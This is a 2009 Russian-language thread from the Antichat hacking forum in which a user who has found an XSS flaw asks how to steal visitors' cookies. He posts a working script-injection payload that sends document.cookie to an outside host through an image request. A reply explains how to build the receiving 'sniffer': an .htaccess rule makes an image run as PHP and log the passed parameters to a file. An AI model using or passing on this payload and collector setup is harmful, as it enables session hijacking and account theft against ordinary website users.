HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > ОФФТОП > Болталка
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Нашел xss
  #1  
Старый 20.11.2009, 01:19
bogger
Познающий
Регистрация: 20.04.2008
Сообщений: 39
С нами: 9504623

Репутация: 49
Unhappy Нашел xss

Нашел xss пытаюсь залить скрипт для сбора куков читал сдесь некоторые статьи где написано что надо вводить

Ввожу следующие

"><script>img = new Image();img.src="http://my site.org/s/HakNet.gif?"+document.cookie;</script>

и ни как не пойму почему картинка ?
и какой скрипт должен быть написан в картинке если вообще должен ? и после куда будут записыватся куки ? объясните пожалуйста , просто я в первые сталкиваюсь с этим
 
Ответить с цитированием

  #2  
Старый 20.11.2009, 01:52
Godfather Bulan
Постоянный
Регистрация: 18.03.2008
Сообщений: 411
С нами: 9551846

Репутация: 2389
По умолчанию

неужели снифф?
 
Ответить с цитированием

  #3  
Старый 20.11.2009, 09:40
Proger10
Познающий
Регистрация: 19.12.2008
Сообщений: 78
С нами: 9154741

Репутация: 13
По умолчанию

С помощью всемогущего .htaccess "говорим" серверу, что картинка это - php. В нутри картинки код примерно следующего смысла: все что передали как параметр писать в файл, ну и иногда для приличия выводим картинку. А картинка это самый безобитный файл :-), ну если хочется то и с txt так же можно сделать.
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Xss для новичков Micr0b Уязвимости 79 06.07.2018 22:05
Нашел XSS. Только вот? gramotey Болталка 8 06.04.2009 15:19
Нашел вот Xss только.... gramotey Болталка 7 02.04.2009 13:23
Cross Site Scripting FAQ k00p3r Уязвимости 6 12.06.2005 16:23
Нашел XSS в теге site. Какой запрос надо вставить, что бы получить куки юзеров? Sky Уязвимости CMS / форумов 3 04.11.2004 15:02



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.